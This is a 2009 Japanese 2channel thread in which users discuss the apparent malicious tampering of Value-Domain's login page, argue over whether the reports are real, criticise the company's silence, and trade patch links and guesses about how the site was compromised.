まあ、少なくともlogin.phpが改竄されてたのは事実なんだし それなら>>167の言うとおり登録ﾕｰｻﾞｰが５０００以上なら 報告しなければ違法になる。 252 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 18:52:37 O] 今回は、閲覧者のPCに対するウィルスの仕込みと、ログイン時のパス抜きの二段構え。 パス抜きがいつぐらいに仕組まれたかが問題だな。 253 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:01:28 0] 実害がないとか言ってるけど、おまえらパス抜きクラッカーが即行動起こすと思ってるのか？ｗ 最近はばれない様に暫くトラッキングして他の情報もぶっこ抜いてるんだぜ 被害が公になるのは数ヵ月後だ、潜伏期間が長いのさ 254 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:06:54 0] だからこそ現時点での中間報告でも デジロからの公式アナウンスが必要なんだけどな 認知した事すらアナウンスしないんだから ちょっと酷すぎるよいくら何でも 255 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:10:14 0] >>252 GENOもそうだった 256 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:10:16 0] >>211はeNomからアカウント変更したみたいじゃね テンプレの３、４って、どうなのよ？ 257 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:10:35 0] またオナニストか 258 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:22:19 O] テンプレの3、4のやり方ではドメインプッシュはできない。 259 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:29:57 0] 原爆と同じ流れなのに釣られる人ってなんなの！ 260 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:30:52 0] 本当ならフォーラムで大騒ぎだろ 261 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:35:11 0] 実は全部がせなんじゃね 魚拓とかウイルス報告も捏造とか 262 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:36:29 0] >>240は？ 魚拓からだとコードがあるけど 直接とべばソースにはコードなかった >>151,187にあるように XPとWindows Server 2003 IEが攻撃対象ということだから 誰かドメイン持ってる人でVista、IE以外の ブラウザの人やってみてくれないかな 263 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:38:13 0] おまえそのレス連射パターン定番だよな いちいち構ってあげたから、次からは少し目新しいのにパターン変えろよ 264 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:38:44 0] 馬鹿はとりあえず過去レスに目を通せよこの馬鹿 265 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:45:05 0] アクアナがおかしいんだけど 266 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:50:23 0] アグネス(チャン)のがおかしいです 267 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 19:57:47 0] エラーページだけど、すでに修正済み？ キャッシュのほう見ればいいの？ 268 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 20:07:09 0] 問題無し、既にセキュリティ修正済、デジロ最強 捏造にだまされるな。 269 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 20:07:43 0] >>214 だめだと思う。「IEの」脆弱性じゃないし、一番詳しいはずの製造元の MicrosoftセキュリティアドバイザリでもOS(XP・2003がやられる)にしか触れてない。 270 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 20:09:10 0] 今度はsageで社員乙といいたいんですね。わかります。 271 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 20:17:19 0] もう、さくらにするお(´；ω；`) 272 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 20:22:02 0] なぜわざわざ高価なさくら? 普通はムームーとかFC2じゃない? 273 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 20:27:09 0] 上場企業だから？＞さくら 274 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 20:30:46 0] 一気に収束しててわろたｗオナニスト乙ｗ 275 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 20:31:49 0] 冗談だお。VD最高だお（ ＾ω＾ ） 276 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 20:35:47 0] デジロ最強(^^)/ 277 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 20:36:18 0] >>271 さくらも去年別な手法(ARPスプーフ。サーバのコンテンツ改竄ではなく 経路上での改竄。FTPで見ても正常なのでわかりにくい)でやられてるよね。 ttp://www.sakura.ad.jp/news/archives/20080602-001.news ttp://www.sakura.ad.jp/news/archives/20080605-002.news 278 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 20:48:40 0] 今日の昼頃と夕方にログインしちまったけど大丈夫かな。 279 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 21:05:46 0] 結局いつものうやむやか。orz まともにしたら金かかるのは分かるがここまでコスト掛けないのも徹底してるな。 入金処理／コピペ対応人員だけで今回も乗り切ろうと？ 280 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 21:07:39 0] 2chデジロ関連スレ工作&会話誘導要員のコスト計上を忘れてますよ 281 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 21:13:17 0] フォーラムに書き込んでこいよ 282 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 21:18:51 0] フォーラムからログインして意味あるの？ ソースにコードはなかったけど 283 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 21:22:10 0] 誰もフォーラムに報告をしていない つまりはそんなことはなかった ２ちゃんねるだけの現象 284 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 21:25:28 0] あんなクローズな空間でクローズなやり取りしてどうすんだよｗ つか今サポ板も何か辺だぞ 285 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 21:27:38 0] >>283 見えない敵と常に戦い続けないといけない性分って大変だね・・・ 何がしたいの？ 話聞いてあげるよ。 286 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 21:38:39 0] じゃあこれも無かったことなんだな wepawet.cs.ucsb.edu/view.php?hash=c060c4c4a3c128706441effa96466c15&t=1246871592&type=js 287 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 21:53:44 0] やっばついこの間にムームーに移管しておいて正解だったな。 まあ俺は大丈夫だけど最悪ドメイン乗っ取られたり、 勝手にドメインを売買されたりするかもな。 288 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:04:24 0] >>284 何か変って？書き込めないとか？ 289 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:04:34 0] これか？ https://muumuu-domain.com/?mode=transfer 290 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 22:04:44 0] 騒ぎになってるから見に来たんだが ネームサーバがボロボロになってるってマジ？？ ドメイン管理提供しててありえないだろ どうなってんだよこの会社は 291 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 22:12:58 0] もうログインしても大丈夫なのか？ そもそもソースを改鼠されるってどんな状況なんだよ 292 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:14:53 0] ネームサーバがボロボロって、もう丸一ヶ月経つぞ。 login.phpの改ざんの件が目下の最重要問題。 ログインしても問題ないかどうかは神のみぞ知る。 293 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:18:18 0] なんか出張行ってる間にずいぶんスレが伸びてると思ったらえらいことになってるんだな。 まあ、俺は常時javascriptはoffにしてるから今回の問題は関係ないけど。 あ、支払いの時だけはjavascript許可しないと動作しなかったのでonにしたけど、かなり前の話しだし。 294 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:28:36 0] クラッカーがPHPを自由に改ざんできたとすると、 パスや個人情報を引き抜き放題だった可能性があるな。 そうだった場合どうなることやら。 295 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:32:51 0] 話をすりかえるのに必死なのがいるなｗ 296 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:35:26 0] >>293 クライアントPCは無事かもしれないけど無関係とはいえないよ 297 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:40:27 0] つかPHP改竄できたのなら 個人情報ぶっこ抜きとか簡単にできるじゃろ ろぎんしてないから関係ないよね(ｷﾘｯ って何アホなこと言ってんだよ 298 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:43:52 0] なんかドメイン乗っ取られたっぽい。サイトが変な広告サイトになってる。 whoisしても全く知らん所になってるし。 あとなんかログインできなかったからパスワード再発行したけど梨の礫。 もうだめぽ。 299 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:47:19 0] >>298 デジロユーザーざまぁｗｗｗｗｗｗｗｗｗ 300 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:47:49 0] >>298 いよいよ実害報告ですか もうちっと詳しく教えていただけませんか？ 301 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:51:06 0] >>289は>>104あたりでダメなのか >>293 よく分からん。>>151ならAdobeReader、FlashPlayer最新バージョン、 javaスクoffならログインしてもいいのか なんか別のとこで、それではダメだったケースがあったが 念のためブラウザＩＥ以外にしといたほうのがいいのか それでは、まるっきりＧＥＮＯといっしょだが 自分では確認できんので、どうしようもない 302 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:52:05 0] >>298 釣りじゃないならもっと詳しい情報を 303 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:55:03 0] 0-day攻撃だったのは分かるんだが どうやってlogin.phpに仕込んだのか謎のままだな 304 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:57:11 0] >>300 さっきサイトを確認しようとしたらサイトが変な広告サイトななってて、 whoisで確認したらIPから所有者情報まで全部書き変わってた。 あとログインしようとしてもできなかったんでパスワード再発行したんだけど、 そのメールも全く届かない。 サポには連絡したけどどうしようも無い状態。 305 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:59:15 0] 気になって一応うちのドメインサイト全チェックしたけど問題なし。 >>304はとりあえずトリップつけてくれ 306 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 22:59:56 0] >>304 乗っ取られたっていうドメインさらしてくれないと 釣りかどうか判断できんのだが 307 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:00:54 0] >>301 >>151とか上のほう少しは読めよ 308 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:02:10 0] 最後にログインしたのはいつ? 該当期間中にvalue-domain.comで何か設定変えた? (クッキー抜かれた?) 309 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:02:18 0] >>304 やふーやぐーぐるはどうなりますか？ なんらかのウイルスに感染しててちがうとこ見に行ってるとか あるかもしれない 310 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:03:27 0] ネタかマジか全然わからんしなあ 311 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:04:11 0] >>304 以下の情報も教えてほしい： (1) TLDは何? .com? .net? .jp? (2) 有効期限はいつまで? 312 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:06:03 0] ドメインロックしてたかどうかとか。 313 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 23:06:35 0] ネタでしょ、登録期限切れだったというオチかな、 314 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:08:51 0] 本当なら大事件だ。ありえん。 315 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:09:51 0] つーか釣りじゃねーの？ タイミングよすぎるだろ。 316 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:09:53 0] こんなけ騒いでるのに国から指導とかされないから アンチが騒いでるだけなんじゃないかと思ってしまうんだが、、 317 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:10:26 0] > whoisで確認したらIPから所有者情報まで全部書き変わってた。 がネタ臭い 318 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:10:35 0] 悲惨な事になってるな。 仕事でも使ってるのに、洒落にならん… 少し高くても別のところにするしかないかなぁ… 319 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:12:35 0] >>317 確かに. WHOISにIPは普通出てこない. 320 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:12:38 0] >>316 ログインフォームを改ざんされたのは事実 個人情報抜かれた可能性があるのも事実 321 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 23:12:39 0] だから、ドメイン何よ、 既に登録内容変わっているなら、さらしてもなんら問題無いでしょ。 322 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:13:17 0] >316 > 国から指導とかされないから そんなに速攻で動くわけないだろハゲ 323 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:14:33 0] 単一報告では釣り臭さが拭えないね まあ昨日今日だけでもコンパネログインした人間も相当数いるだろうから今後どうなるか とりあえず糞デジロ何かアナウンスせいよｗ 324 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:14:56 0] 実は釣りでした。 食いついたおまいら涙目ｗｗｗｗｗｗｗ 325 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:18:24 0] 世界的なニュースになるけで、そんなネタには釣られませんが。 レジストラ/代行がそれやられちゃうと、核爆弾並みの被害ですわ。 326 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:21:23 0] >>307 ActiveX コントロールを殺しとけばＩＥでもいいのか ＞レジストリにkill bitを立てるか、以下の「Fix it」を押しましょう。 ttp://support.microsoft.com/kb/972890/ 327 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:22:08 0] >>324 誰も釣られてないだろ 具体性の無い文章で釣ったつもりか？ 328 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:23:00 0] 所詮は後釣り宣言 329 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:23:33 0] つーか釣りだろ whoisでIPわかるはずないし あとさっきから報告の続きないし 330 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:25:23 0] >>325->>329 まあまあ デジロ社員じゃない方の例の子っぽいからもっと愛に溢れたレスを沢山つけてあげて下さい・・・ お世話かけさせますけどすいませんね 331 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 23:29:40 0] 　　　 　 ,――――――ヽ、 　　　,／　　　　　　　　　　　~＼ 　 ／　　 ,へ＿Vへ＿＿　　　　~＼ ／　　　ノ　　　　　　　　 ゜ー-、　　`ヽ |　　　 ﾉ /￣＼　　　／￣~ヽ　ヽ 　　 i |　　 ノ　　　　　　　　　　　　　　|　　ノ ＼　 |　　＜●＞　　＜●＞　 （　 ） 　＼ |　　　　　 ｜　|　　　　　　 i / 　 　 |　　　　　 /　　ヽ　 　 　 　ﾚ そろそろ僕の出番ですね 　　　i　　　　　（●_●）　 　　　 / ＩＰＡの誇りをかけて 　　　 i、　　　 ,-――-、　 　・ / ValueDomainを 　　　　i、　　<（EEEEE）>　∵/ 　　　 　 i、 　 ＼＿__／　　_/ まピョーん☆ 　　　 　　 ＼　　　　　　 ,ノ 　　,,.....イ.ヽヽ、ー-―一ノﾞ-､. 　　:　 　| 　';　＼_____ ノ.| ヽ　i 　　　 　 |　　＼/ﾞ（__)＼,| 　i　| 　　　 　 ＞　　 ヽ. ハ　 | 　 |｜ 332 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:32:08 0] デジロックの技術水準っていうか、レベルの判定って難しい気がする。 ネームサーバーだって、ハッキリ言えば、どこでも危険で、bindの話しだし、 login.phpが書き換えられたってのは、本当にどんなセキュリティを突かれたのか、 興味深いな。 確かなのは、zendでコンパイルしていないっぽいのと、何からの 穴があったとのでは？と推測の領域。ディレクトリをdigできる様なアップロードするような 仕組みがあったと思えないんだよな。FTPなんか空いているわけないし、 不審な部分と言えば、決済の外部業者渡しくらい？ しかし、これもクレカの処理を内部で行っていない分、セキュアだしな。 333 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:37:01 0] > FTPなんか空いているわけないし 云々 なぜ言い切れる？ 334 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:37:59 0] 先月のイベントでムームーに逃げて良かった…と思いたいが… XREA+の更新時期なんだよ〜 やべぇ 閉鎖もできん… 335 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:38:33 0] >>333 俺なら閉じる。 百歩譲って、FTPSでお願いします。 336 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:43:48 0] まっとうなネットサービス系の会社ならFTP開けたりせんのだけどな 337 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:46:36 0] まっとうなら、な。 そんなの百も承知で聞く。 なぜ言い切れる？ 338 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:47:06 0] 普通に外注のシナチク技術者の仕業かなと思ったんだけど それだったらlogin.php弄る理由がないんだよね… 339 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:48:05 0] >>337 > $ ftp www.value-domain.com > Connected to www.value-domain.com. > Connection closed by remote host. 340 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:48:40 0] >>337 統計的な話になるのだが、この種の事故の大部分は サーバーサイド言語で作られたプログラムの穴が大半です。 ポートの穴やハード的な原因は最後の最後に疑うべきというのが、 今風じゃないのかな？ 341 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:49:59 0] >>339 おいおい、FTPデーモンがおるやんけ　汗 342 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:50:05 0] login.php、login.phpって言ってるやつ、ちょっと必死すぎない？ 343 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:51:14 0] login.php、login.php 344 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:54:35 0] SSHじゃなくて、telnetが開いていたに１票 345 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:54:49 0] そういやユーザーフォーラムには誰も投稿してないよね 必死なのは２ちゃんだけだな 346 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:56:56 0] >>339 他からうpできる穴がある可能性は？ 347 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:57:41 0] すべてのことが釣りだった場合は、釣られた。 348 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 23:57:48 0] ユーザーフォーラムに行くのですら危険だと思ったら、投稿されていなくて当然だろう 349 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 00:00:44 0] >>346 イワユル、ウェルノウンポートと言われるポートでは、難しいので、 そうじゃない、ポートとか？ DNSが開いていてもそう簡単には掘れないと思うし、対策済みかと 350 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 00:03:59 0] >>345 キーロガーの存在に気がつかなかった可哀想なユーザーが、いつも通りログインし、ユーザーフォーラムを使っているのだよ 351 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 00:06:06 0] telnetとかftpあけたままとか・・ど素人なのか？ 技術者が抜けて今や素人だけで運営してるとか？ 352 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 00:08:43 0] 知ってる奴はヤバいのでフォーラムに近寄らない ↓ 誰も警告を発しないし、当然デジロからのニュースリリースも無い ↓ 知らない奴は普通にフォーラムに書き込もうとログイン ↓ マルウェア増殖、仕掛けた奴(ﾟдﾟ)ｳﾏｰ とこういう自体な訳だな 353 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 00:13:17 0] 昨日、リアルタイムで改ざんされてたの見たけど、 魚拓とか、それに続く状況報告とか、詳細まで踏み込まれはじめたときに、 ふと気づいたら改ざん部分が戻っていたんだよな せめて改ざんへの対応をしたのか否かくらいは早く告知ほしいが、 その告知がでたところで、この状況じゃ、告知それ自体が改ざんかもしれない 354 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 00:16:32 0] ちょっと質問なんですが、 ユーザーサポートの sb.xrea.com/ vBulletinが改ざんされたってことでしょうか？ value-domainのloginがやられたかと思ってたよorz 355 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 00:20:38 0] >>354 value-domainのloginページが改ざんされていた 現在は修正されているが、告知はない 356 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 00:21:38 0] >>355 それなら告知すべきことですね。ヤバイレベルです。 vBulletinはOSSなんでセキュリティホールもあり得るので。 357 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 00:22:26 0] value-domain.comのlogin.phpを書き換えられる環境にある奴が sb.xrea.comのvBulletinのログインに手出してないと考える方が甘いって事だろ 358 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 00:32:25 0] login.php自体が書き換えられたかは未だ不明でしょ? 359 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 00:32:39 0] 真偽確認＆アナウンスするはずの対応部署とやらに連絡がいったとされる時間から、もうすぐ２４時間 さて、これは告知まで何日かかるかな 360 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 00:34:01 0] >>358 それはともかくlogin.phpにリクエストを出して戻ってきたコードに埋め込まれていたのは確か 361 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 00:48:06 0] 今でもその改竄された時点での魚拓とかある？ 362 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 00:49:37 0] >>361 >>92がまだ見られるんじゃないかな 363 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 00:49:53 0] 改竄事件は、他社工作員の捏造。。気にする必要なし。 デジロのセキュリティは万全。 364 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 00:50:55 0] >>363 今日は遅出勤務なの？ 何時まで？ 365 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 01:02:01 0] いまだ何もアナウンスがないなんて企業としてどうかしてる。 366 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 01:03:21 0] >>354のサポートページ自体はソースに >>31-32の変数コードなかったけど ログインしてみないと、その先は分からないからな フォーラムもトップは大丈夫だけど ログインしてみないと分からない >>362　　 魚拓はコード残ってるから開かないほうがいい 367 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 01:03:30 0] 何もなかったから、アナウンスなど無くて当然。 これは、捏造事件です。 368 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 01:08:11 0] >>367 隠蔽する気マンマンだなぁ 369 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 01:10:04 0] 公的ぽいところに届出が無い限り、 がせだと思って良いかな？ www.ipa.go.jp/security/ 370 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 01:11:38 0] 釣りにマジレスするのもなんだけど ガセだ捏造だと主張する人は 魚拓もグルだと言うつもりなんだろうか 371 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 01:12:48 0] 土下座しろとかは言わない もともと、ここはプロかハイアマが使うんだから、 淡々と、しかし正確に事実関係とか告知すれば足ると思うし、かつ必要だと思うんだ 372 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 01:16:17 0] >>370 釣りにマジレスすんなよ、と言わせていただこう 373 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 01:18:50 0] スラッシュドットジャパンでよければ ttp://slashdot.jp/firehose.pl?op=view&id=117594 374 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 01:20:17 0] >>360 それはともかく　て。違いが分からないの？ 375 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 01:33:00 0] 徐々にニュースサイト系に情報広がってるね これがVD流の七夕祭りですか 376 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 01:35:33 0] >>369 脆弱性有無の調査方法 DNSキャッシュポイズニングの脆弱性の有無を確認 www.ipa.go.jp/security/vuln/documents/2008/200809_DNS.html * porttest.dns-oarc.net -- Check your resolver's source port behavior * https://www.dns-oarc.net/oarc/services/porttest * txidtest.dns-oarc.net -- Check your resolver's transaction ID behavior * https://www.dns-oarc.net/oarc/services/txidtest * IANA ― Cross-Pollination Scan * recursive.iana.org/ この３つで確認すればいいのかな？ 377 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 01:42:17 0] さっさと仕事しないとGENOウィルスみたいにウィルスの名前になるとかすっげえ不名誉なことになる悪寒 378 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 01:43:34 0] コードは確かに書き加えられてたよ。 ここに貼られてたソースもハッキリ見た。 昨夜９時頃ログインしたが今のところ何ともない。 今後どうなるかはわからんが... 明日俺のサイト書き換えられてたりして...orz 379 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 01:43:58 0] 「VDウイルス」 「デジロウイルス」 悪くないな 380 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 01:58:29 0] コードが書き換えられていたのなら、 それを修正対応処理した時点でデジロが何かアナウンスして当然でしょ。 アナウンスが無いのはコード書き換えなど無かったからです。 他社工作員の捏造にだまされないように、 381 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 02:00:36 0] >>376は全然ちがったみたい >>369見る前はこれかと思ったんだけど でも、ログインは関係ないのか？ もしかして、ServerとClientは 別物と何度言ったら(nyってやつ？ 382 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 02:06:45 O] >>380 ﾉｼ >>286 383 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 02:08:33 0] >>286の読み方がわからない 384 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 02:12:13 0] 隠蔽しようと頑張ってるとしか思えんわ 385 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 02:48:42 0] なんだかすごいことになったみたいだね よりによって久々にDNSいじるためにおととい昨日今日とログインしたというのに… firefoxだけど大丈夫なのかしら 386 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 02:52:26 0] >>340 まあそういう穴もあるんだがGeno系は違う場合もあるからねえ 今回もアプリよりFTPとかそっちを疑ったほうがいいのかもしれない Genoのときもそうだったけど被害サイトが特定のCMSや Webサーバじゃなかったんで最初混乱した データを抜いたんじゃなくてPHP書き換えちゃってるんだしね こういう流れも考えられるよってかんじで参考程度だけど 中の人のPCがGeno系に感染→FTPパスとられる→サーバ側改ざん(新型うめこみ) 387 名前：名無しさん＠お腹いっぱい。 [2009/07/08(水) 02:52:41 0] >>385 ログイン処理の部分で書き換えられていたならばアウト 報告が無いのでどこまで書き換えられたかは判らないが。 388 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 02:53:34 0] >>385 FirefoxであればAdobe製品を最新にしていれば クライアント側は大丈夫かもしれない 389 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 02:57:00 0] >>387 そうなのか…ありがとう JSは大丈夫だったとしてもログイン処理のほうが問題だよね こればっかりはどうしようもないから報告待ちするしかないなぁ… 390 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 02:59:20 0] >>388 GENOの件でReaderとFlashPlayerは最新のはずだからそこは大丈夫そう 教えてくれてありがとう 391 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 03:13:24 0] 去年改ざんされた広告サーバのIPアドレスを逆引きすると、sakura1.digi-rock.com。 今回改竄されたVDのサーバが、sakura2.digi-rock.com。 また、さくらインターネットに置いているサーバだな。 392 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 03:33:50 0] >>388 いや、Adobe製品・・・というか全てのリッチコンテンツ用プラグインを削除しないと安心は出来ないだろ。どうせまだ穴があるに決まってる。 HTML/JavaScriptパーサバグは流石にもうIEくらいしか食らわないだろうけど、プラグインは枯れるどころか不安定機能が絶賛増加中なわけで 393 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 03:39:37 0] ('A｀)ｱｱｱｧｧｧｧｧｧｧｧｧｧｧ.... . 三年寝太郎の俺が 久しぶりに土曜日からずっとアレコレやってたらこの騒ぎ。。。 流し読みだけど↓で合ってる？ 　login.phpが書き換えられた。 　 　�@ 変なJavaScriptが埋め込まれてる。 　　　　→ 変なActiveXが実行される。 　　　　　→ IEの人は要注意。（魚拓も危険） 　　　　　　→ ともかく全員これを当てておけ。 ttp://support.microsoft.com/kb/972890 　 　�A login.phpが書き換えられたって事は… 　　　　→ ログイン危険。 　　　　→ というか、何もかもやばいだろ＼(＾o＾)／ 394 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 03:43:12 0] >>392 そんなあなたにFirefox+NoScript(フレーム禁止も設定で追加) 395 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/08(水) 03:47:41 0] >>394 既にOperaの標準機能でプラグイン停止して運用してる 